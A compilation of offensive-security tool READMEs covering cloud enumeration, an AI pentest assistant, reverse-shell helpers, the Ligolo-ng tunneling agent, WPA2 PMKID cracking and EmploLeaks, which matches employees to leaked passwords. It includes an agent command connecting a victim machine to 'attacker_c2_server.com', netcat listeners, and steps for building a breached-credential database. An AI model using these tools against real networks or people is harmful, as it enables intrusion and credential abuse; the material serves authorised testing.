The only required argument is at least one keyword. You can use the built-in fuzzing strings, but you will get better results if you supply your own with -m and/or -b.

You can provide multiple keywords by specifying the -k argument multiple times.

Keywords are mutated automatically using strings from enum_tools/fuzz.txt or a file you provide with the -m flag. Services that require a second-level of brute forcing (Azure Containers and GCP Functions) will also use fuzz.txt by default or a file you provide with the -b flag.

Let's say you were researching "somecompany" whose website is "somecompany.io" that makes a product called "blockchaindoohickey". You could run the tool like this:

./cloud_enum.py -k somecompany -k somecompany.io -k blockchaindoohickey

HTTP scraping and DNS lookups use 5 threads each by default. You can try increasing this, but eventually the cloud providers will rate limit you. Here is an example to increase to 10.

./cloud_enum.py -k keyword -t 10

IMPORTANT: Some resources (Azure Containers, GCP Functions) are discovered per-region. To save time scanning, there is a "REGIONS" variable defined in cloudenum/azure_regions.py and cloudenum/gcp_regions.py that is set by default to use only 1 region. You may want to look at these files and edit them to be relevant to your own work.

Complete Usage Details

usage: cloud_enum.py [-h] -k KEYWORD [-m MUTATIONS] [-b BRUTE]

Multi-cloud enumeration utility. All hail OSINT!

optional arguments:
-h, --help show this help message and exit
-k KEYWORD, --keyword KEYWORD
Keyword. Can use argument multiple times.
-kf KEYFILE, --keyfile KEYFILE
Input file with a single keyword per line.
-m MUTATIONS, --mutations MUTATIONS
Mutations. Default: enum_tools/fuzz.txt
-b BRUTE, --brute BRUTE
List to brute-force Azure container names. Default: enum_tools/fuzz.txt
-t THREADS, --threads THREADS
Threads for HTTP brute-force. Default = 5
-ns NAMESERVER, --nameserver NAMESERVER
DNS server to use in brute-force.
-l LOGFILE, --logfile LOGFILE
Will APPEND found items to specified file.
-f FORMAT, --format FORMAT
Format for log file (text,json,csv - defaults to text)
--disable-aws Disable Amazon checks.
--disable-azure Disable Azure checks.
--disable-gcp Disable Google checks.
-qs, --quickscan Disable all mutations and second-level scans

Thanks

So far, I have borrowed from: - Some of the permutations from GCPBucketBrute



Pentest-Muse-Cli - AI Assistant Tailored For Cybersecurity Professionals

By: Zion3R


Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.


Pentest Muse Web App

In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, and would be a good AI assistant for your pentesting job.

Disclaimer

This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

Requirements

  • Python 3.12 or later
  • Necessary Python packages as listed in requirements.txt

Setup

Standard Setup

  1. Clone the repository:

git clone https://github.com/pentestmuse-ai/PentestMuse cd PentestMuse

  1. Install the required packages:

pip install -r requirements.txt

Alternative Setup (Package Installation)

Install Pentest Muse as a Python Package:

pip install .

Running the Application

Chat Mode (Default)

In the chat mode, you can chat with pentest muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:

python run_app.py

or

pmuse

Agent Mode (Experimental)

You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program with agent model, you can use:

python run_app.py agent

or

pmuse agent

Selection of Language Models

Managed APIs

You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the pentest muse cli, and the program will prompt you to login.

OpenAI API keys

Alternatively, you can also choose to use your own OpenAI API keys. To do this, you can simply add argument --openai-api-key=[your openai api key] when starting the program.

Contact

For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at contact@pentestmuse.ai or join our discord. Your input is invaluable in helping us improve and evolve.



Kali Linux 2024.1 - Penetration Testing and Ethical Hacking Linux Distribution

By: Zion3R

Time for another Kali Linux release! – Kali Linux 2024.1. This release has various impressive updates.


The summary of the changelog since the 2023.4 release from December is:

Secbutler - The Perfect Butler For Pentesters, Bug-Bounty Hunters And Security Researchers

By: Zion3R

Essential utilities for pentester, bug-bounty hunters and security researchers

secbutler is a utility tool made for pentesters, bug-bounty hunters and security researchers that contains all the most used and tedious stuff commonly used while performing cybersecurity activities (like installing sec-related tools, retrieving commands for revshells, serving common payloads, obtaining a working proxy, managing wordlists and so forth).

The goal is to obtain a tool that meets the requirements of the community, therefore suggestions and PRs are very welcome!


Features
  • Generate a reverse shell command
  • Obtain proxy
  • Download & deploy common payloads
  • Obtain reverse shell listener command
  • Generate bash install script for common tools
  • Generate bash download script for Wordlists
  • Read common cheatsheets and payloads

Usage
secbutler -h

This will display the help for the tool

                   __          __  __
________ _____/ /_ __ __/ /_/ /__ _____
/ ___/ _ \/ ___/ __ \/ / / / __/ / _ \/ ___/
(__ ) __/ /__/ /_/ / /_/ / /_/ / __/ /
/____/\___/\___/_.___/\__,_/\__/_/\___/_/

v0.1.9 - https://github.com/groundsec/secbutler

Essential utilities for pentester, bug-bounty hunters and security researchers

Usage:
secbutler [flags]
secbutler [command]

Available Commands:
cheatsheet Read common cheatsheets & payloads
help Help about any command
listener Obtain the command to start a reverse shell listener
payloads Obtain and serve common payloads
proxy Obtain a random proxy from FreeProxy
revshell Obtain the command for a reverse shell
tools Generate a install script for the most common cybersecurity tools
version Print the current version
wordlists Generate a download script for the most common wordlists

Flags:
-h, --help help for secbutler

Use "secbutler [command] --help" for more information about a command.



Installation

Run the following command to install the latest version:

go install github.com/groundsec/secbutler@latest

Or you can simply grab an executable from the Releases page.


License

secbutler is made with πŸ–€ by the GroundSec team and released under the MIT LICENSE.



PurpleKeep - Providing Azure Pipelines To Create An Infrastructure And Run Atomic Tests

By: Zion3R


With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.

To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the Atomic Red Team project which allows to simulate attacks following MITRE TTPs (Tactics, Techniques, and Procedures). PurpleKeep enhances the simulation of these TTPs to serve as a starting point for the evaluation of the effectiveness of detection rules.

Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.

Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.

To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.

TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.


Requirements

The project is based on Azure Pipelines and requires the following to be able to run:

  • Azure Service Connection to a resource group as described in the Microsoft Docs
  • Assignment of the "Key Vault Administrator" Role for the previously created Enterprise Application
  • MDE onboarding script, placed as a Secure File in the Library of Azure DevOps and make it accessible to the pipelines

Optional

You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.

Refer to the variables file for your configurable items.

Design

Infrastructure

Deploying the infrastructure uses the Azure Pipeline to perform the following steps:

  • Deploy Azure services:
    • Key Vault
    • Log Analytics Workspace
    • Data Connection Endpoint
    • Data Connection Rule
  • Generate SSH keypair and password for the Windows account and store in the Key Vault
  • Create a Windows 11 VM
  • Install OpenSSH
  • Configure and deploy the SSH public key
  • Install Invoke-AtomicRedTeam
  • Install Microsoft Defender for Endpoint and configure exceptions
  • (Optional) Apply security and/or audit policy files
  • Reboot

Simulation

Currently only the Atomics from the public repository are supported. The pipelines takes a Technique ID as input or a comma seperate list of techniques, for example:

  • T1059.003
  • T1027,T1049,T1003

The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.

There are currently two ways to run the simulation:

Rotating simulation

This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytic workspace will maintain the logs of each run.

Warning: this will onboard a large number of hosts into your EDR

Single deploy simulation

A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTP's will be simulated on this instance. This is the fastests way to simulate and prevents onboarding a large number of devices, however running a lot of simulations in a same environment has the risk of contaminating the environment and making the simulations less stable and predictable.

TODO

Must have

  • Check if pre-reqs have been fullfilled before executing the atomic
  • Provide the ability to import own group policy
  • Cleanup biceps and pipelines by using a master template (Complete build)
  • Build pipeline that runs technique sequently with reboots in between
  • Add Azure ServiceConnection to variables instead of parameters

Nice to have

  • MDE Off-boarding (?)
  • Automatically join and leave AD domain
  • Make Atomics repository configureable
  • Deploy VECTR as part of the infrastructure and ingest results during simulation. Also see the VECTR API issue
  • Tune alert API call to Microsoft Defender for Endpoint (Microsoft.Security alertsSuppressionRules)
  • Add C2 infrastructure for manual or C2 based simulations

Issues

  • Atomics do not return if a simulation succeeded or not
  • Unreliable OpenSSH extension installer failing infrastructure deployment
  • Spamming onboarded devices in the EDR

References



Ligolo-Ng - An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface

By: Zion3R


Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).


Features

  • Tun interface (No more SOCKS!)
  • Simple UI with agent selection and network information
  • Easy to use and setup
  • Automatic certificate configuration with Let's Encrypt
  • Performant (Multiplexing)
  • Does not require high privileges
  • Socket listening/binding on the agent
  • Multiple platforms supported for the agent

How is this different from Ligolo/Chisel/Meterpreter... ?

Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.

When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.

As an example, for a TCP connection:

  • SYN are translated to connect() on remote
  • SYN-ACK is sent back if connect() succeed
  • RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
  • Nothing is sent if timeout

This allows running tools like nmap without the use of proxychains (simpler and faster).

Building & Usage

Precompiled binaries

Precompiled binaries (Windows/Linux/macOS) are available on the Release page.

Building Ligolo-ng

Building ligolo-ng (Go >= 1.20 is required):

$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go

Setup Ligolo-ng

Linux

When using Linux, you need to create a tun interface on the Proxy Server (C2):

$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up

Windows

You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).

Running Ligolo-ng proxy server

Start the proxy server on your Command and Control (C2) server (default port 11601):

$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates

TLS Options

Using Let's Encrypt Autocert

When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.

Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval

Using your own TLS certificates

If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.

Automatic self-signed certificates (NOT RECOMMENDED)

The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.

The -ignore-cert option needs to be used with the agent.

Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.

Using Ligolo-ng

Start the agent on your target (victim) computer (no privileges are required!):

$ ./agent -connect attacker_c2_server.com:11601

If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.

A session should appear on the proxy server.

INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

Use the session command to select the agent.

ligolo-ng Β» session 
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Display the network configuration of the agent using the ifconfig command:

[Agent : nchatelain@nworkstation] Β» ifconfig 
[...]
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Interface 3 β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ Name β”‚ wlp3s0 β”‚
β”‚ Hardware MAC β”‚ de:ad:be:ef:ca:fe β”‚
β”‚ MTU β”‚ 1500 β”‚
β”‚ Flags β”‚ up|broadcast|multicast β”‚
β”‚ IPv4 Address β”‚ 192.168.0.30/24 β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.

Linux:

$ sudo ip route add 192.168.0.0/24 dev ligolo

Windows:

> netsh int ipv4 show interfaces

Idx MΓ©t MTU Γ‰tat Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo

> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]

Start the tunnel on the proxy:

[Agent : nchatelain@nworkstation] Β» start
[Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation

You can now access the 192.168.0.0/24 agent network from the proxy server.

$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]

Agent Binding/Listening

You can listen to ports on the agent and redirect connections to your control/proxy server.

In a ligolo session, use the listener_add command.

The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.

[Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!

On the proxy:

$ nc -lvp 4321

When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.

This is very useful when using reverse tcp/udp payloads.

You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:

[Agent : nchatelain@nworkstation] Β» listener_list 
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚ Active listeners β”‚
β”œβ”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€ ───────────────────┬─────────────────────────
β”‚ # β”‚ AGENT β”‚ AGENT LISTENER ADDRESS β”‚ PROXY REDIRECT ADDRESS β”‚
β”œβ”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€& #9508;
β”‚ 0 β”‚ nchatelain@nworkstation β”‚ 0.0.0.0:1234 β”‚ 127.0.0.1:4321 β”‚
β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Agent : nchatelain@nworkstation] Β» listener_stop 0
INFO[1505] Listener closed.

Demo

ligolo-ng_demo.mp4

Does it require Administrator/root access ?

On the agent side, no! Everything can be performed without administrative access.

However, on your relay/proxy server, you need to be able to create a tun interface.

Supported protocols/packets

  • TCP
  • UDP
  • ICMP (echo requests)

Performance

You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.

$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8. 00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver

Caveats

Because the agent runs without privileges, it's not possible to forward raw packets. When you perform an Nmap SYN scan, a TCP connect() is performed on the agent instead.

When using nmap, you should use --unprivileged or -PE to avoid false positives.
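For example, a connect scan through the tunnel could look like this (the target range below is a placeholder):

nmap -sT --unprivileged -p 1-1000 10.10.0.0/24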

Todo

  • Implement other ICMP error messages (this will speed up UDP scans) ;
  • Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up) ;
  • Add mTLS support.

Credits

  • Nicolas Chatelain <nicolas -at- chatelain.me>


Rayder - A Lightweight Tool For Orchestrating And Organizing Your Bug Hunting Recon / Pentesting Command-Line Workflows

By: Zion3R


Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive tasks and execute modules in parallel when their commands do not depend on each other.


Installation

To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:

go install github.com/devanshbatham/rayder@v0.0.4

Usage

Rayder offers a straightforward way to execute workflows defined in YAML files. Use the following command:

rayder -w path/to/workflow.yaml

Workflow Configuration

A workflow is defined in a YAML file with the following structure:

vars:
  VAR_NAME: value
  # Add more variables...

parallel: true|false
modules:
  - name: task-name
    cmds:
      - command-1
      - command-2
      # Add more commands...
    silent: true|false
  # Add more modules...

Using Variables in Workflows

Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}).

Defining Variables

To define variables, add them to the vars section of your workflow YAML file:

vars:
  VAR_NAME: value
  ANOTHER_VAR: another_value
  # Add more variables...

Referencing Variables in Commands

You can reference variables within your command strings using double curly braces ({{}}). For example, if you defined a variable OUTPUT_DIR, you can use it like this:

modules:
  - name: example-task
    cmds:
      - echo "Output directory {{OUTPUT_DIR}}"

Supplying Variables via the Command Line

You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value to provide values for specific variables. For example:

rayder -w path/to/workflow.yaml VAR_NAME=new_value ANOTHER_VAR=updated_value

If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars section of your workflow YAML file.

Remember that variables supplied via the command line will override the default values defined in the YAML configuration.

Example

Example 1:

Here's an example of how you can define, reference, and supply variables in your workflow configuration:

vars:
  ORG: "example.org"
  OUTPUT_DIR: "results"

modules:
  - name: example-task
    cmds:
      - echo "Organization {{ORG}}"
      - echo "Output directory {{OUTPUT_DIR}}"

When executing the workflow, you can provide values for ORG and OUTPUT_DIR via the command line like this:

rayder -w path/to/workflow.yaml ORG=custom_org OUTPUT_DIR=custom_results_dir

This will override the default values and use the provided values for these variables.

Example 2:

Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:

vars:
  ORG: "Acme, Inc"
  OUTPUT_DIR: "results-dir"

parallel: false
modules:
  - name: reverse-whois
    silent: false
    cmds:
      - mkdir -p {{OUTPUT_DIR}}
      - revwhoix -k "{{ORG}}" > {{OUTPUT_DIR}}/root-domains.txt

  - name: finding-subdomains
    cmds:
      - xargs -I {} -a {{OUTPUT_DIR}}/root-domains.txt echo "subfinder -d {} -o {}.out" | quaithe -workers 30
    silent: false

  - name: cleaning-subdomains
    cmds:
      - cat *.out > {{OUTPUT_DIR}}/root-subdomains.txt
      - rm *.out
    silent: true

  - name: resolving-subdomains
    cmds:
      - cat {{OUTPUT_DIR}}/root-subdomains.txt | dnsx -silent -threads 100 -o {{OUTPUT_DIR}}/resolved-subdomains.txt
    silent: false

  - name: checking-alive-subdomains
    cmds:
      - cat {{OUTPUT_DIR}}/resolved-subdomains.txt | httpx -silent -threads 100 -o {{OUTPUT_DIR}}/alive-subdomains.txt
    silent: false

To execute the above workflow, run the following command:

rayder -w path/to/reverse-whois.yaml ORG="Yelp, Inc" OUTPUT_DIR=results

Parallel Execution

The parallel field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel to true allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false, modules will execute one after another.

Workflows

Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!

Inspiration

The inspiration for this project comes from the awesome Taskfile project.



Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

By: Zion3R


This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.


Program Usage

python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac, and pmkid must be hexstrings, e.g. b8621f50edd9

How PMKID is Calculated

The two main formulas to obtain a PMKID are as follows:

  1. Pairwise Master Key (PMK) Calculation: PMK = PBKDF2(HMAC-SHA1, passphrase, salt = SSID, 4096 iterations, 32 bytes)
  2. PMKID Calculation: PMKID = HMAC-SHA1(PMK, "PMK Name" + bssid + clientmac)

This is just for understanding; both are already implemented in find_pw_chunk and calculate_pmkid.
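For illustration, here is a minimal standalone Python sketch of both formulas (not the tool's actual find_pw_chunk/calculate_pmkid code; the passphrase, SSID, and MAC hexstrings are made up):

import hashlib
import hmac

def pmkid(passphrase, ssid, apmac, clientmac):
    # 1) PMK: PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations, 32-byte key
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)
    # 2) PMKID: first 16 bytes of HMAC-SHA1(PMK, "PMK Name" | AP MAC | client MAC)
    data = b"PMK Name" + bytes.fromhex(apmac) + bytes.fromhex(clientmac)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16].hex()

print(pmkid("password123", "HomeWifi", "b8621f50edd9", "00aabbccddee"))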

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in Wireshark.

*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the steps below; the manual way is for understanding.

To obtain the PMKID manually from Wireshark, put your wireless adapter in monitor mode and start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL message 1 handshake. Follow the next three steps to obtain the fields needed for the arguments.

Open the pcap in WireShark:

  • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
  • In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
  • In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below

If the access point is vulnerable, you should see the PMKID value, as in the screenshot below:

Demo Run

Disclaimer

This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.



EmploLeaks - An OSINT Tool That Helps Detect Members Of A Company With Leaked Credentials

By: Zion3R

Β 

This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.

How it Works

The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You can easily add your own database and connect to it through the tool.


Installation

To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the cli folder:

cd cli
pip install -r requirements.txt

OSX

We know that there is a problem when installing the tool due to the psycopg2 binary. If you run into this problem, you can solve it by running:

cd cli
python3 -m pip install psycopg2-binary

Basic Usage

To use the tool, simply run the following command:

python3 cli/emploleaks.py

If everything went well during the installation, you will be able to start using EmploLeaks:

___________              .__         .__                 __
\_ _____/ _____ ______ | | ____ | | ____ _____ | | __ ______
| __)_ / \____ \| | / _ \| | _/ __ \__ \ | |/ / / ___/
| \ Y Y \ |_> > |_( <_> ) |_\ ___/ / __ \| < \___ \
/_______ /__|_| / __/|____/\____/|____/\___ >____ /__|_ \/____ >
\/ \/|__| \/ \/ \/ \/

OSINT tool to chain multiple apis
emploleaks>

Right now, the tool supports two functionalities:

  • Linkedin, for searching all employees from a company and get their personal emails.
    • A GitLab extension, which is capable of finding personal code repositories from the employees.
  • If defined and connected, when the tool is gathering employees profiles, a search to a COMB database will be made in order to retrieve leaked passwords.

Retrieving Linkedin Profiles

First, you must set the plugin to use, which in this case is linkedin. Then set your authentication tokens and run the impersonate process:

emploleaks> use --plugin linkedin
emploleaks(linkedin)> setopt JSESSIONID
JSESSIONID:
[+] Updating value successfull
emploleaks(linkedin)> setopt li-at
li-at:
[+] Updating value successfull
emploleaks(linkedin)> show options
Module options:

Name Current Setting Required Description
---------- ----------------------------------- ---------- -----------------------------------
hide yes no hide the JSESSIONID field
JSESSIONID ************************** no active cookie session in browser #1
li-at AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG no active cookie session in browser #1
YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M
cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI
lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET
kyCyfN58SNNH
emploleaks(linkedin)> run impersonate
[+] Using cookies from the browser
Setting for first time JSESSIONID
Setting for first time li_at

li_at and JSESSIONID are the authentication cookies of your LinkedIn session in the browser. You can use the Web Developer Tools to get them: sign in to LinkedIn normally, right-click the page and choose Inspect, and you will find those cookies in the Storage tab.

Now that the module is configured, you can run it and start gathering information from the company:

Get Linkedin accounts + Leaked Passwords

We created a custom workflow, where with the information retrieved by Linkedin, we try to match employees' personal emails to potential leaked passwords. In this case, you can connect to a database (in our case we have a custom indexed COMB database) using the connect command, as it is shown below:

emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4
[+] Connecting to the Leak Database...
[*] version: PostgreSQL 12.15

Once it's connected, you can run the workflow. With all the users gathered, the tool will try to search in the database if a leaked credential is affecting someone:

In conclusion, the tool will generate console output with the following information:
  • A list of employees of the company (obtained from LinkedIn)
  • The social network profiles associated with each employee (obtained from email address)
  • A list of leaked passwords associated with each email address.

How to build the indexed COMB database

An important aspect of this project is the use of the indexed COMB database; to build your version you need to download the torrent first. Be careful, because the files plus the indexed version require at least 400 GB of available disk space.

Once the torrent has been completely downloaded, you will get a folder structure like the following:

β”œβ”€β”€ count_total.sh
β”œβ”€β”€ data
β”‚   β”œβ”€β”€ 0
β”‚   β”œβ”€β”€ 1
β”‚   β”‚   β”œβ”€β”€ 0
β”‚   β”‚   β”œβ”€β”€ 1
β”‚   β”‚   β”œβ”€β”€ 2
β”‚   β”‚   β”œβ”€β”€ 3
β”‚   β”‚   β”œβ”€β”€ 4
β”‚   β”‚   β”œβ”€β”€ 5
β”‚   β”‚   β”œβ”€β”€ 6
β”‚   β”‚   β”œβ”€β”€ 7
β”‚   β”‚   β”œβ”€β”€ 8
β”‚   β”‚   β”œβ”€β”€ 9
β”‚   β”‚   β”œβ”€β”€ a
β”‚   β”‚   β”œβ”€β”€ b
β”‚   β”‚   β”œβ”€β”€ c
β”‚   β”‚   β”œβ”€β”€ d
β”‚   β”‚   β”œβ”€β”€ e
β”‚   β”‚   β”œβ”€β”€ f
β”‚   β”‚   β”œβ”€β”€ g
β”‚   β”‚   β”œβ”€β”€ h
β”‚   β”‚   β”œβ”€β”€ i
β”‚   β”‚   β”œβ”€β”€ j
β”‚   β”‚   β”œβ”€β”€ k
β”‚   β”‚   β”œβ”€β”€ l
